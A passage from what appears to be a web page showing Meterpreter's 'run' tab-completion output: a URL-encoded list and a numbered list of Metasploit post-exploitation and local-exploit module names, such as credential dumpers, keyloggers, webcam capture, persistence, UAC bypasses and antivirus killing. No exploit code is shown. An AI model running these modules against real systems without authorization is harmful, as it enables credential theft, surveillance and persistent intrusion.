20post%2Flinux%2Fgather%2Fenum_configs%5Cnrun%20post%2Flinux%2Fgather%2Fenum_containers%5Cnrun%20post%2Flinux%2Fgather%2Fenum_nagios_xi%5Cnrun%20post%2Flinux%2Fgather%2Fenum_network%5Cnrun%20post%2Flinux%2Fgather%2Fenum_protections%5Cnrun%20post%2Flinux%2Fgather%2Fenum_psk%5Cnrun%20post%2Flinux%2Fgather%2Fenum_system%5Cnrun%20post%2Flinux%2Fgather%2Fenum_users_history%5Cnrun%20post%2Flinux%2Fgather%2Fgnome_commander_creds%5Cnrun%20post%2Flinux%2Fgather%2Fgnome_keyring_dump%5Cnrun%20post%2Flinux%2Fgather%2Fhashdump%5Cnrun%20post%2Flinux%2Fgather%2Fmount_cifs_creds%5Cnrun%20post%2Flinux%2Fgather%2Fopenvpn_credentials%5Cnrun%20post%2Flinux%2Fgather%2Fphpmyadmin_credsteal%5Cnrun%20post%2Flinux%2Fgather%2Fpptpd_chap_secrets%5Cnrun%20post%2Flinux%2Fgather%2Ftor_hiddenservices%5Cnrun%20post%2Flinux%2Fmanage%2Fdns_spoofing%5Cnrun%20post%2Flinux%2Fmanage%2Fdownload_exec%5Cnrun%20post%2Flinux%2Fmanage%2Fiptables_removal%5Cnrun%20post%2Flinux%2Fmanage%2Fpseudo_shell%5Cnrun%20post%2Flinux%2Fmanage%2Fsshkey_persistence%5Cnrun%20post%2Fmulti%2Fescalate%2Faws_create_iam_user%5Cnrun%20post%2Fmulti%2Fescalate%2Fcups_root_file_read%5Cnrun%20post%2Fmulti%2Fescalate%2Fmetasploit_pcaplog%5Cnrun%20post%2Fmulti%2Fgather%2Fapple_ios_backup%5Cnrun%20post%2Fmulti%2Fgather%2Faws_ec2_instance_metadata%5Cnrun%20post%2Fmulti%2Fgather%2Faws_keys%5Cnrun%20post%2Fmulti%2Fgather%2Fcheck_malware%5Cnrun%20post%2Fmulti%2Fgather%2Fchrome_cookies%5Cnrun%20post%2Fmulti%2Fgather%2Fdbvis_enum%5Cnrun%20post%2Fmulti%2Fgather%2Fdns_bruteforce%5Cnrun%20post%2Fmulti%2Fgather%2Fdns_reverse_lookup%5Cnrun%20post%2Fmulti%2Fgather%2Fdns_srv_lookup%5Cnrun%20post%2Fmulti%2Fgather%2Fdocker_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fenum_hexchat%5Cnrun%20post%2Fmulti%2Fgather%2Fenum_software_versions%5Cnrun%20post%2Fmulti%2Fgather%2Fenum_vbox%5Cnrun%20post%2Fmulti%2Fgather%2Fenv%5Cnrun%20post%2Fmulti%2Fgather%2Ffetchmailrc_creds%5Cnrun%20post%2Fmulti%2Fgather%2Ffilezilla_client_cred%5Cnrun%20post%2Fmulti%2Fgather%2Ffind_vmx%5Cnrun%20post%2Fmulti%2Fgather%2Ffirefox_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fgpg_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fgrub_creds%5Cnrun%20post%2Fmulti%2Fgather%2Firssi_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fjboss_gather%5Cnrun%20post%2Fmulti%2Fgather%2Fjenkins_gather%5Cnrun%20post%2Fmulti%2Fgather%2Flastpass_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fmaven_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fmulti_command%5Cnrun%20post%2Fmulti%2Fgather%2Fnetrc_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fpgpass_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fpidgin_cred%5Cnrun%20post%2Fmulti%2Fgather%2Fping_sweep%5Cnrun%20post%2Fmulti%2Fgather%2Fremmina_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fresolve_hosts%5Cnrun%20post%2Fmulti%2Fgather%2Frsyncd_creds%5Cnrun%20post%2Fmulti%2Fgather%2Frubygems_api_key%5Cnrun%20post%2Fmulti%2Fgather%2Frun_console_rc_file%5Cnrun%20post%2Fmulti%2Fgather%2Fskype_enum%5Cnrun%20post%2Fmulti%2Fgather%2Fssh_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fthunderbird_creds%5Cnrun%20post%2Fmulti%2Fgather%2Ftomcat_gather%5Cnrun%20post%2Fmulti%2Fgather%2Fubiquiti_unifi_backup%5Cnrun%20post%2Fmulti%2Fgather%2Fwlan_geolocate%5Cnrun%20post%2Fmulti%2Fgeneral%2Fclose%5Cnrun%20post%2Fmulti%2Fgeneral%2Fexecute%5Cnrun%20post%2Fmulti%2Fgeneral%2Fwall%5Cnrun%20post%2Fmulti%2Fmanage%2Fautoroute%5Cnrun%20post%2Fmulti%2Fmanage%2Fdbvis_add_db_admin%5Cnrun%20post%2Fmulti%2Fmanage%2Fdbvis_query%5Cnrun%20post%2Fmulti%2Fmanage%2Fhsts_eraser%5Cnrun%20post%2Fmulti%2Fmanage%2Fmulti_post%5Cnrun%20post%2Fmulti%2Fmanage%2Fopen%5Cnrun%20post%2Fmulti%2Fmanage%2Fplay_youtube%5Cnrun%20post%2Fmulti%2Fmanage%2Frecord_mic%5Cnrun%20post%2Fmulti%2Fmanage%2Fscreensaver%5Cnrun%20post%2Fmulti%2Fmanage%2Fscreenshare%5Cnrun%20post%2Fmulti%2Fmanage%2Fset_wallpaper%5Cnrun%20post%2Fmulti%2Fmanage%2Fshell_to_meterpreter%5Cnrun%20post%2Fmulti%2Fmanage%2Fsudo%5Cnrun%20post%2Fmulti%2Fmanage%2Fsystem_session%5Cnrun%20post%2Fmulti%2Fmanage%2Fupload_exec%5Cnrun%20post%2Fmulti%2Fmanage%2Fzip%5Cnrun%20post%2Fmulti%2Frecon%2Flocal_exploit_suggester%5Cnrun%20post%2Fmulti%2Frecon%2Fmultiport_egress_traffic%5Cnrun%20post%2Fmulti%2Frecon%2Fsudo_commands%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_brocade%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_cisco%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_f5%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_juniper%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_mikrotik%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_vyos%5Cnrun%20post%2Fosx%2Fadmin%2Fsay%5Cnrun%20post%2Fosx%2Fcapture%2Fkeylog_recorder%5Cnrun%20post%2Fosx%2Fcapture%2Fscreen%5Cnrun%20post%2Fosx%2Fescalate%2Ftccbypass%5Cnrun%20post%2Fosx%2Fgather%2Fapfs_encrypted_volume_passwd%5Cnrun%20post%2Fosx%2Fgather%2Fautologin_password%5Cnrun%20post%2Fosx%2Fgather%2Fenum_adium%5Cnrun%20post%2Fosx%2Fgather%2Fenum_airport%5Cnrun%20post%2Fosx%2Fgather%2Fenum_chicken_vnc_profile%5Cnrun%20post%2Fosx%2Fgather%2Fenum_colloquy%5Cnrun%20post%2Fosx%2Fgather%2Fenum_keychain%5Cnrun%20post%2Fosx%2Fgather%2Fenum_messages%5Cnrun%20post%2Fosx%2Fgather%2Fenum_osx%5Cnrun%20post%2Fosx%2Fgather%2Fhashdump%5Cnrun%20post%2Fosx%2Fgather%2Fpassword_prompt_spoof%5Cnrun%20post%2Fosx%2Fgather%2Fsafari_lastsession%5Cnrun%20post%2Fosx%2Fgather%2Fvnc_password_osx%5Cnrun%20post%2Fosx%2Fmanage%2Fmount_share%5Cnrun%20post%2Fosx%2Fmanage%2Frecord_mic%5Cnrun%20post%2Fosx%2Fmanage%2Fsonic_pi%5Cnrun%20post%2Fosx%2Fmanage%2Fvpn%5Cnrun%20post%2Fosx%2Fmanage%2Fwebcam%5Cnrun%20post%2Fsolaris%2Fescalate%2Fpfexec%5Cnrun%20post%2Fsolaris%2Fescalate%2Fsrsexec_readline%5Cnrun%20post%2Fsolaris%2Fgather%2Fcheckvm%5Cnrun%20post%2Fsolaris%2Fgather%2Fenum_packages%5Cnrun%20post%2Fsolaris%2Fgather%2Fenum_services%5Cnrun%20post%2Fsolaris%2Fgather%2Fhashdump%5Cnrun%20post%2Fwindows%2Fcapture%2Fkeylog_recorder%5Cnrun%20post%2Fwindows%2Fcapture%2Flockout_keylogger%5Cnrun%20post%2Fwindows%2Fescalate%2Fdroplnk%5Cnrun%20post%2Fwindows%2Fescalate%2Fgetsystem%5Cnrun%20post%2Fwindows%2Fescalate%2Fgolden_ticket%5Cnrun%20post%2Fwindows%2Fescalate%2Fms10_073_kbdlayout%5Cnrun%20post%2Fwindows%2Fescalate%2Fscreen_unlock%5Cnrun%20post%2Fwindows%2Fescalate%2Funmarshal_cmd_exec%5Cnrun%20post%2Fwindows%2Fgather%2Fad_to_sqlite%5Cnrun%20post%2Fwindows%2Fgather%2Farp_scanner%5Cnrun%20post%2Fwindows%2Fgather%2Favast_memory_dump%5Cnrun%20post%2Fwindows%2Fgather%2Fbitcoin_jacker%5Cnrun%20post%2Fwindows%2Fgather%2Fbitlocker_fvek%5Cnrun%20post%2Fwindows%2Fgather%2Fbloodhound%5Cnrun%20post%2Fwindows%2Fgather%2Fcachedump%5Cnrun%20post%2Fwindows%2Fgather%2Fcheckvm%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Favira_password%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fbulletproof_ftp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fcoreftp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fcredential_collector%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fdomain_hashdump%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fdynazip_log%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fdyndns%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fenum_cred_store%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fenum_laps%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fenum_picasa_pwds%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fepo_sql%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Ffilezilla_server%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fflashfxp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fftpnavigator%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fftpx%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fgpp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fheidisql%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fidm%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fimail%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fimvu%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmcafee_vse_hashdump%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmdaemon_cred_collector%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmeebo%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmremote%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmssql_local_hashdump%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fnimbuzz%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Foutlook%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fpulse_secure%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fpurevpn_cred_collector%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Frazer_synapse%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Frazorsql%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Frdc_manager_creds%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsecurecrt%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fskype%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsmartermail%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsmartftp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fspark_im%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsso%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsteam%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fteamviewer_passwords%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Ftortoisesvn%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Ftotal_commander%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Ftrillian%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fvnc%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fwindows_autologin%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fwinscp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fwsftp_client%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fxshell_xftp_password%5Cnrun%20post%2Fwindows%2Fgather%2Fdnscache_dump%5Cnrun%20post%2Fwindows%2Fgather%2Fdumplinks%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_bitlocker%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_computers%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_groups%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_managedby_groups%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_service_principal_names%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_to_wordlist%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_user_comments%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_users%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_applications%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_artifacts%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_av_excluded%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_chrome%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_computers%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_db%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_devices%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_dirperms%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domain%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domain_group_users%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domain_tokens%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domain_users%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domains%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_emet%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_files%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_hostfile%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_hyperv_vms%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ie%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_logged_on_users%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ms_product_keys%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_muicache%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_onedrive%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_patches%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_powershell_env%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_prefetch%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_proxy%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_putty_saved_sessions%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_services%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_shares%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_snmp%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_termserv%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_tokens%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_tomcat%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_trusted_locations%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_unattend%5Cnrun%20post%2Fwindows%2Fgather%2Ffile_from_raw_ntfs%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fbrowser_history%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fduqu_check%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fenum_drives%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Ffanny_bmp_check%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fimager%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fnbd_server%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Frecovery_files%5Cnrun%20post%2Fwindows%2Fgather%2Fhashdump%5Cnrun%20post%2Fwindows%2Fgather%2Flocal_admin_search_enum%5Cnrun%20post%2Fwindows%2Fgather%2Flsa_secrets%5Cnrun%20post%2Fwindows%2Fgather%2Fmake_csv_orgchart%5Cnrun%20post%2Fwindows%2Fgather%2Fmemory_grep%5Cnrun%20post%2Fwindows%2Fgather%2Fnetlm_downgrade%5Cnrun%20post%2Fwindows%2Fgather%2Fntds_grabber%5Cnrun%20post%2Fwindows%2Fgather%2Fntds_location%5Cnrun%20post%2Fwindows%2Fgather%2Foutlook%5Cnrun%20post%2Fwindows%2Fgather%2Fphish_windows_credentials%5Cnrun%20post%2Fwindows%2Fgather%2Fpsreadline_history%5Cnrun%20post%2Fwindows%2Fgather%2Fresolve_sid%5Cnrun%20post%2Fwindows%2Fgather%2Freverse_lookup%5Cnrun%20post%2Fwindows%2Fgather%2Fscreen_spy%5Cnrun%20post%2Fwindows%2Fgather%2Fsmart_hashdump%5Cnrun%20post%2Fwindows%2Fgather%2Ftcpnetstat%5Cnrun%20post%2Fwindows%2Fgather%2Fusb_history%5Cnrun%20post%2Fwindows%2Fgather%2Fwin_privs%5Cnrun%20post%2Fwindows%2Fgather%2Fwmic_command%5Cnrun%20post%2Fwindows%2Fgather%2Fword_unc_injector%5Cnrun%20post%2Fwindows%2Fmanage%2Fadd_user%5Cnrun%20post%2Fwindows%2Fmanage%2Farchmigrate%5Cnrun%20post%2Fwindows%2Fmanage%2Fchange_password%5Cnrun%20post%2Fwindows%2Fmanage%2Fclone_proxy_settings%5Cnrun%20post%2Fwindows%2Fmanage%2Fdelete_user%5Cnrun%20post%2Fwindows%2Fmanage%2Fdownload_exec%5Cnrun%20post%2Fwindows%2Fmanage%2Fdriver_loader%5Cnrun%20post%2Fwindows%2Fmanage%2Fenable_rdp%5Cnrun%20post%2Fwindows%2Fmanage%2Fenable_support_account%5Cnrun%20post%2Fwindows%2Fmanage%2Fexec_powershell%5Cnrun%20post%2Fwindows%2Fmanage%2Fexecute_dotnet_assembly%5Cnrun%20post%2Fwindows%2Fmanage%2Fforward_pageant%5Cnrun%20post%2Fwindows%2Fmanage%2Fhashcarve%5Cnrun%20post%2Fwindows%2Fmanage%2Fie_proxypac%5Cnrun%20post%2Fwindows%2Fmanage%2Finject_ca%5Cnrun%20post%2Fwindows%2Fmanage%2Finject_host%5Cnrun%20post%2Fwindows%2Fmanage%2Finstall_python%5Cnrun%20post%2Fwindows%2Fmanage%2Finstall_ssh%5Cnrun%20post%2Fwindows%2Fmanage%2Fkillav%5Cnrun%20post%2Fwindows%2Fmanage%2Fmigrate%5Cnrun%20post%2Fwindows%2Fmanage%2Fmssql_local_auth_bypass%5Cnrun%20post%2Fwindows%2Fmanage%2Fmulti_meterpreter_inject%5Cnrun%20post%2Fwindows%2Fmanage%2Fnbd_server%5Cnrun%20post%2Fwindows%2Fmanage%2Fpeinjector%5Cnrun%20post%2Fwindows%2Fmanage%2Fpersistence_exe%5Cnrun%20post%2Fwindows%2Fmanage%2Fportproxy%5Cnrun%20post%2Fwindows%2Fmanage%2Fpowershell%2Fbuild_net_code%5Cnrun%20post%2Fwindows%2Fmanage%2Fpowershell%2Fexec_powershell%5Cnrun%20post%2Fwindows%2Fmanage%2Fpowershell%2Fload_script%5Cnrun%20post%2Fwindows%2Fmanage%2Fpptp_tunnel%5Cnrun%20post%2Fwindows%2Fmanage%2Fpriv_migrate%5Cnrun%20post%2Fwindows%2Fmanage%2Fpxeexploit%5Cnrun%20post%2Fwindows%2Fmanage%2Freflective_dll_inject%5Cnrun%20post%2Fwindows%2Fmanage%2Fremove_ca%5Cnrun%20post%2Fwindows%2Fmanage%2Fremove_host%5Cnrun%20post%2Fwindows%2Fmanage%2Frid_hijack%5Cnrun%20post%2Fwindows%2Fmanage%2Frollback_defender_signatures%5Cnrun%20post%2Fwindows%2Fmanage%2Frpcapd_start%5Cnrun%20post%2Fwindows%2Fmanage%2Frun_as%5Cnrun%20post%2Fwindows%2Fmanage%2Frun_as_psh%5Cnrun%20post%2Fwindows%2Fmanage%2Fsdel%5Cnrun%20post%2Fwindows%2Fmanage%2Fshellcode_inject%5Cnrun%20post%2Fwindows%2Fmanage%2Fsshkey_persistence%5Cnrun%20post%2Fwindows%2Fmanage%2Fsticky_keys%5Cnrun%20post%2Fwindows%2Fmanage%2Fvmdk_mount%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_create%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_list%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_mount%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_set_storage%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_storage%5Cnrun%20post%2Fwindows%2Fmanage%2Fwdigest_caching%5Cnrun%20post%2Fwindows%2Fmanage%2Fwebcam%5Cnrun%20post%2Fwindows%2Frecon%2Fcomputer_browser_discovery%5Cnrun%20post%2Fwindows%2Frecon%2Foutbound_ports%5Cnrun%20post%2Fwindows%2Frecon%2Fresolve_ip%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_bss_list%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_current_connection%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_disconnect%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_probe_request%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_profile%5Cnrun%20powerdump%5Cnrun%20prefetchtool%5Cnrun%20process_memdump%5Cnrun%20remotewinenum%5Cnrun%20scheduleme%5Cnrun%20schelevator%5Cnrun%20schtasksabuse%5Cnrun%20scraper%5Cnrun%20screen_unlock%5Cnrun%20screenspy%5Cnrun%20search_dwld%5Cnrun%20service_manager%5Cnrun%20service_permissions_escalate%5Cnrun%20sound_recorder%5Cnrun%20srt_webdrive_priv%5Cnrun%20uploadexec%5Cnrun%20virtualbox_sysenter_dos%5Cnrun%20virusscan_bypass%5Cnrun%20vnc%5Cnrun%20webcam%5Cnrun%20winbf%5Cnrun%20winenum%5Cnrun%20wmic%22%7D" data-cke-widget-keep-attr="0" data-widget="codeSnippet"><code class="hljs language-bash">meterpreter > run
  2. Display all 522 possibilities? (y or n)
  3. run arp_scanner
  4. run autoroute
  5. run checkvm
  6. run credcollect
  7. run domain_list_gen
  8. run dumplinks
  9. run duplicate
  10. run enum_chrome
  11. run enum_firefox
  12. run enum_logged_on_users
  13. run enum_powershell_env
  14. run enum_putty
  15. run enum_shares
  16. run enum_vmware
  17. run event_manager
  18. run exploit/multi/local/allwinner_backdoor
  19. run exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
  20. run exploit/multi/local/xorg_x11_suid_server
  21. run exploit/multi/local/xorg_x11_suid_server_modulepath
  22. run exploit/windows/local/adobe_sandbox_adobecollabsync
  23. run exploit/windows/local/agnitum_outpost_acs
  24. run exploit/windows/local/alpc_taskscheduler
  25. run exploit/windows/local/always_install_elevated
  26. run exploit/windows/local/anyconnect_lpe
  27. run exploit/windows/local/applocker_bypass
  28. run exploit/windows/local/appxsvc_hard_link_privesc
  29. run exploit/windows/local/ask
  30. run exploit/windows/local/bits_ntlm_token_impersonation
  31. run exploit/windows/local/bthpan
  32. run exploit/windows/local/bypassuac
  33. run exploit/windows/local/bypassuac_comhijack
  34. run exploit/windows/local/bypassuac_dotnet_profiler
  35. run exploit/windows/local/bypassuac_eventvwr
  36. run exploit/windows/local/bypassuac_fodhelper
  37. run exploit/windows/local/bypassuac_injection
  38. run exploit/windows/local/bypassuac_injection_winsxs
  39. run exploit/windows/local/bypassuac_sdclt
  40. run exploit/windows/local/bypassuac_silentcleanup
  41. run exploit/windows/local/bypassuac_sluihijack
  42. run exploit/windows/local/bypassuac_vbs
  43. run exploit/windows/local/bypassuac_windows_store_filesys
  44. run exploit/windows/local/bypassuac_windows_store_reg
  45. run exploit/windows/local/capcom_sys_exec
  46. run exploit/windows/local/comahawk
  47. run exploit/windows/local/current_user_psexec
  48. run exploit/windows/local/cve_2017_8464_lnk_lpe
  49. run exploit/windows/local/cve_2018_8453_win32k_priv_esc
  50. run exploit/windows/local/cve_2019_1458_wizardopium
  51. run exploit/windows/local/cve_2020_0668_service_tracing
  52. run exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
  53. run exploit/windows/local/cve_2020_0796_smbghost
  54. run exploit/windows/local/cve_2020_1048_printerdemon
  55. run exploit/windows/local/cve_2020_1054_drawiconex_lpe
  56. run exploit/windows/local/cve_2020_1313_system_orchestrator
  57. run exploit/windows/local/cve_2020_1337_printerdemon
  58. run exploit/windows/local/cve_2020_17136
  59. run exploit/windows/local/dnsadmin_serverlevelplugindll
  60. run exploit/windows/local/docker_credential_wincred
  61. run exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
  62. run exploit/windows/local/gog_galaxyclientservice_privesc
  63. run exploit/windows/local/ikeext_service
  64. run exploit/windows/local/ipass_launch_app
  65. run exploit/windows/local/lenovo_systemupdate
  66. run exploit/windows/local/mov_ss
  67. run exploit/windows/local/mqac_write
  68. run exploit/windows/local/ms10_015_kitrap0d
  69. run exploit/windows/local/ms10_092_schelevator
  70. run exploit/windows/local/ms11_080_afdjoinleaf
  71. run exploit/windows/local/ms13_005_hwnd_broadcast
  72. run exploit/windows/local/ms13_053_schlamperei
  73. run exploit/windows/local/ms13_081_track_popup_menu
  74. run exploit/windows/local/ms13_097_ie_registry_symlink
  75. run exploit/windows/local/ms14_009_ie_dfsvc
  76. run exploit/windows/local/ms14_058_track_popup_menu
  77. run exploit/windows/local/ms14_070_tcpip_ioctl
  78. run exploit/windows/local/ms15_004_tswbproxy
  79. run exploit/windows/local/ms15_051_client_copy_image
  80. run exploit/windows/local/ms15_078_atmfd_bof
  81. run exploit/windows/local/ms16_014_wmi_recv_notif
  82. run exploit/windows/local/ms16_016_webdav
  83. run exploit/windows/local/ms16_032_secondary_logon_handle_privesc
  84. run exploit/windows/local/ms16_075_reflection
  85. run exploit/windows/local/ms16_075_reflection_juicy
  86. run exploit/windows/local/ms18_8120_win32k_privesc
  87. run exploit/windows/local/ms_ndproxy
  88. run exploit/windows/local/novell_client_nicm
  89. run exploit/windows/local/novell_client_nwfs
  90. run exploit/windows/local/ntapphelpcachecontrol
  91. run exploit/windows/local/ntusermndragover
  92. run exploit/windows/local/nvidia_nvsvc
  93. run exploit/windows/local/panda_psevents
  94. run exploit/windows/local/payload_inject
  95. run exploit/windows/local/persistence
  96. run exploit/windows/local/persistence_image_exec_options
  97. run exploit/windows/local/persistence_service
  98. run exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
  99. run exploit/windows/local/powershell_cmd_upgrade
  100. run exploit/windows/local/powershell_remoting
  101. run exploit/windows/local/ppr_flatten_rec
  102. run exploit/windows/local/ps_persist
  103. run exploit/windows/local/ps_wmi_exec
  104. run exploit/windows/local/pxeexploit
  105. run exploit/windows/local/razer_zwopenprocess
  106. run exploit/windows/local/registry_persistence
  107. run exploit/windows/local/ricoh_driver_privesc
  108. run exploit/windows/local/run_as
  109. run exploit/windows/local/s4u_persistence
  110. run exploit/windows/local/service_permissions
  111. run exploit/windows/local/unquoted_service_path
  112. run exploit/windows/local/virtual_box_guest_additions
  113. run exploit/windows/local/virtual_box_opengl_escape
  114. run exploit/windows/local/vss_persistence
  115. run exploit/windows/local/webexec
  116. run exploit/windows/local/windscribe_windscribeservice_priv_esc
  117. run exploit/windows/local/wmi
  118. run exploit/windows/local/wmi_persistence
  119. run file_collector
  120. run get_application_list
  121. run get_env
  122. run get_filezilla_creds
  123. run get_local_subnets
  124. run get_pidgin_creds
  125. run get_valid_community
  126. run getcountermeasure
  127. run getgui
  128. run gettelnet
  129. run getvncpw
  130. run hashdump
  131. run hostsedit
  132. run keylogrecorder
  133. run killav
  134. run metsvc
  135. run migrate
  136. run multi_console_command
  137. run multi_meter_inject
  138. run multicommand
  139. run multiscript
  140. run netenum
  141. run packetrecorder
  142. run panda_2007_pavsrv51
  143. run persistence
  144. run pml_driver_config
  145. run post/aix/hashdump
  146. run post/android/capture/screen
  147. run post/android/gather/hashdump
  148. run post/android/gather/sub_info
  149. run post/android/gather/wireless_ap
  150. run post/android/manage/remove_lock
  151. run post/android/manage/remove_lock_root
  152. run post/apple_ios/gather/ios_image_gather
  153. run post/apple_ios/gather/ios_text_gather
  154. run post/bsd/gather/hashdump
  155. run post/firefox/gather/cookies
  156. run post/firefox/gather/history
  157. run post/firefox/gather/passwords
  158. run post/firefox/gather/xss
  159. run post/firefox/manage/webcam_chat
  160. run post/hardware/automotive/can_flood
  161. run post/hardware/automotive/canprobe
  162. run post/hardware/automotive/getvinfo
  163. run post/hardware/automotive/identifymodules
  164. run post/hardware/automotive/malibu_overheat
  165. run post/hardware/automotive/mazda_ic_mover
  166. run post/hardware/automotive/pdt
  167. run post/hardware/rftransceiver/rfpwnon
  168. run post/hardware/rftransceiver/transmitter
  169. run post/hardware/zigbee/zstumbler
